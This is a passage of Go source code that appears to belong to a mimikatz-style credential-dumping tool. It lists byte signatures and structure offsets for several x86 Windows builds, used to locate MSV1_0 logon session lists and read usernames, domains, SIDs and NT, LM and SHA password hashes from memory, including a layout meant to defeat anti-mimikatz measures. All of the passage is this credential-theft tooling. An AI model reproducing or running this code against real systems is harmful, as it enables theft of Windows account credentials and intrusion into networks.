			binary.GetStructureFieldOffset(kiwiMsv10List60Type, "Unk1", false),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureX86,
		BuildNumberMin:        windows.BuildNumberWindows7,
		BuildNumberMax:        windows.BuildNumberWindows8,
		Pattern:               []byte{0x89, 0x71, 0x04, 0x89, 0x30, 0x8d, 0x04, 0xbd},
		Offsets: []int64{
			int64(-11),
			int64(-42),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "Flink", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "Domain", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "LogonServer", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "Sid", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "LocallyUniqueIdentifier", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "Credentials", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "CredentialManager", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "LogonTime", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61Type, "Unk1", false),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureX86,
		BuildNumberMin:        windows.BuildNumberWindows7,
		BuildNumberMax:        windows.BuildNumberWindows8,
		Pattern:               []byte{0x89, 0x71, 0x04, 0x89, 0x30, 0x8d, 0x04, 0xbd},
		Offsets: []int64{
			int64(-11),
			int64(-42),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "Flink", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "Domain", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "LogonServer", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "Sid", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "LocallyUniqueIdentifier", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "Credentials", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "CredentialManager", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "LogonTime", false),
			binary.GetStructureFieldOffset(kiwiMsv10List61AntiMimikatzType, "Unk1", false),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureX86,
		BuildNumberMin:        windows.BuildNumberWindows8,
		BuildNumberMax:        windows.BuildNumberWindowsBlue,
		Pattern:               []byte{0x8b, 0x45, 0xf8, 0x8b, 0x55, 0x08, 0x8b, 0xde, 0x89, 0x02, 0x89, 0x5d, 0xf0, 0x85, 0xc9, 0x74},
		Offsets: []int64{
			int64(18),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "Flink", false),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "Domain", false),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "LogonServer", false),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "Sid", false),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "LocallyUniqueIdentifier", false),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "Credentials", false),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "CredentialManager", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "LogonTime", false),
			binary.GetStructureFieldOffset(kiwiMsv10List62Type, "Unk1", false),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureX86,
		BuildNumberMin:        windows.BuildNumberWindows8,
		BuildNumberMax:        windows.BuildNumberWindowsBlue,
		Pattern:               []byte{0x8b, 0x45, 0xf8, 0x8b, 0x55, 0x08, 0x8b, 0xde, 0x89, 0x02, 0x89, 0x5d, 0xf0, 0x85, 0xc9, 0x74},
		Offsets: []int64{
			int64(18),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Flink", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Domain", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonServer", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Sid", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LocallyUniqueIdentifier", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Credentials", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "CredentialManager", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonTime", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Unk1", false),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureX86,
		BuildNumberMin:        windows.BuildNumberWindowsBlue,
		BuildNumberMax:        windows.BuildNumberWindows10_1507,
		Pattern:               []byte{0x8b, 0x4d, 0xe4, 0x8b, 0x45, 0xf4, 0x89, 0x75, 0xe8, 0x89, 0x01, 0x85, 0xff, 0x74},
		Offsets: []int64{
			int64(16),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Flink", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Domain", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonServer", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Sid", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LocallyUniqueIdentifier", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Credentials", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "CredentialManager", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LogonDomainName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "NtOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "LmOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential, "ShaOwPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonTime", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Unk1", false),
		},
	},
	globals.Signature{
		ProcessorArchitecture: windows.ProcessorArchitectureX86,
		BuildNumberMin:        windows.BuildNumberWindows10_1507,
		Pattern:               []byte{0x8b, 0x4d, 0xe8, 0x8b, 0x45, 0xf4, 0x89, 0x75, 0xec, 0x89, 0x01, 0x85, 0xff, 0x74},
		Offsets: []int64{
			int64(16),
			int64(-4),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Flink", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Domain", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonServer", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Sid", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LocallyUniqueIdentifier", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Credentials", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "CredentialManager", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10Old, "LogonDomainName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10Old, "UserName", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10Old, "NtOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10Old, "LmOwfPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10PrimaryCredential10Old, "ShaOwPassword", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "LogonTime", false),
			binary.GetStructureFieldOffset(kiwiMsv10List63Type, "Unk1", false),
		},
	},
}
